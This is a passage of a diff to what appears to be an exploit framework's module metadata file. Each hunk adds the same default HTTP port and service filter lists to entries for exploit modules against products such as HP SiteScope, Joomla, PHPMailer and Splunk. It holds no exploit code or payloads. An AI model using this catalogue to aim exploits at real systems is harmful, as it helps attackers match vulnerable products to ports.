"autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 / Windows", "HP SiteScope 11.20 / Linux" @@ -46002,6 +60680,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 / Windows 2003 SP2", "HP SiteScope 11.20 / Linux CentOS 6.3" @@ -46037,6 +60730,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Linux", @@ -46072,6 +60780,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -46111,6 +60834,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -46143,6 +60881,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -46180,6 +60933,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46220,6 +60988,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46258,6 +61041,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -46298,6 +61096,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46335,6 +61148,21 @@ "platform": "Java", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal" ], @@ -46368,6 +61196,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows", "Linux", @@ -46404,6 +61247,21 @@ "platform": "Linux,Unix,Windows", "arch": "cmd, python, x86, x64", "rport": "8080", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix (In-Memory)", "Python (In-Memory)", @@ -46444,6 +61302,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HipChat for Jira plugin on Java", "HipChat for Jira plugin on Windows", @@ -46487,6 +61360,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 1.5.0 - 3.4.5" ], @@ -46519,6 +61407,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46554,6 +61457,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic LotusCMS 3.0" ], @@ -46590,6 +61508,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "log1 CMS 2.0" ], @@ -46627,6 +61560,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46660,6 +61608,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mako Server v2.5, 2.6" ], @@ -46693,6 +61656,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows", @@ -46733,6 +61711,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9", @@ -46768,6 +61761,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ServiceDesk Plus v9 b9000 - b9102 / Java Universal" ], @@ -46803,6 +61811,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 6262, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -46838,6 +61861,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mantis <= 1.1.3" ], @@ -46874,6 +61912,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -46908,6 +61961,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46945,6 +62013,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic PHP-CLI", "Linux CMD", @@ -46981,6 +62064,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47012,6 +62110,21 @@ "platform": "", "arch": "cmd", "rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix", "Windows" @@ -47044,6 +62157,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "mma file uploader" ], @@ -47078,6 +62206,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -47115,6 +62258,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Monstra CMS 3.0.4" ], @@ -47148,6 +62306,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47185,6 +62358,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Movable Type 4.2x, 4.3x" ], @@ -47221,6 +62409,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix CMD", "Linux Payload" @@ -47254,6 +62457,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -47287,6 +62505,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 7021, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -47322,6 +62555,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nibbleblog 4.0.3" ], @@ -47355,6 +62603,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Novell ServiceDesk / Linux", @@ -47390,6 +62653,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47423,6 +62701,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47459,6 +62752,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows x86 (Native Payload)", @@ -47493,6 +62801,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47528,6 +62851,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP payload)" ], @@ -47561,6 +62899,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal" ], @@ -47595,6 +62948,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OATS <= 12.4.0.2.0 (Windows)", "OATS <= 12.4.0.2.0 (Linux)" @@ -47632,6 +63000,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows" @@ -47671,6 +63054,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Command payload", "Unix Command payload" @@ -47707,6 +63105,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 2480, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Unix CMD", @@ -47741,6 +63154,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "osCommerce 2.3.4.1" ], @@ -47780,6 +63208,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -47814,6 +63257,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47854,6 +63312,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47887,6 +63360,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHP Utility Belt" ], @@ -47920,6 +63408,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHP Volunteer Management 1.0.2" ], @@ -47954,6 +63457,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "phpFileManager / Unix", "phpFileManager / Windows" @@ -47991,6 +63509,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48028,6 +63561,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHPMailer <5.2.18", "PHPMailer 5.2.18 - 5.2.19" @@ -48064,6 +63612,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHPMoAdmin" ], @@ -48098,6 +63661,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48136,6 +63714,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -48175,6 +63768,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48213,6 +63821,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48248,6 +63871,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48281,6 +63919,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PhpTax 0.8" ], @@ -48317,6 +63970,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48353,6 +64021,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PlaySMS 1.4" ], @@ -48386,6 +64069,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PlaySMS 1.4" ], @@ -48422,6 +64120,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48458,6 +64171,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48490,6 +64218,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48524,6 +64267,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProcessMaker Open Source 2.x (PHP Payload)" ], @@ -48555,6 +64313,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -48588,6 +64361,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48620,6 +64408,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48655,6 +64458,21 @@ "platform": "BSD,Linux", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ruby on Rails 4.0.8 July 2, 2014" ], @@ -48689,6 +64507,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48721,6 +64554,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48757,6 +64605,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 3000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48793,6 +64656,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48828,6 +64706,21 @@ "platform": "Linux,Unix,Windows", "arch": "x86, x64, cmd", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux (Native Payload)", "Linux (CMD Payload)", @@ -48864,6 +64757,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48897,6 +64805,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "backdoor / Unix", "backdoor / Windows" @@ -48935,6 +64858,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48967,6 +64905,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49000,6 +64953,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Solarwinds Store Manager <= 5.7.1" ], @@ -49036,6 +65004,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SonicWALL GMS 6.0 Viewpoint / Java Universal", "SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2", @@ -49073,6 +65056,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Dell SonicWALL Scrutinizer 11.01 on Windows", @@ -49111,6 +65109,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal CMD" ], @@ -49147,6 +65160,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Splunk >= 5.0.1 / Linux", @@ -49181,6 +65209,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49213,6 +65256,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49249,6 +65307,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -49285,6 +65358,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -49322,6 +65410,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic detection", "Windows", @@ -49359,6 +65462,21 @@ "platform": "Linux,Python,Unix,Windows", "arch": "cmd, python, x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix (In-Memory)", "Windows (In-Memory)", @@ -49398,6 +65516,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal" @@ -49439,6 +65572,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java", "Linux", @@ -49479,6 +65627,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49518,6 +65681,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49556,6 +65734,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -49595,6 +65788,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + 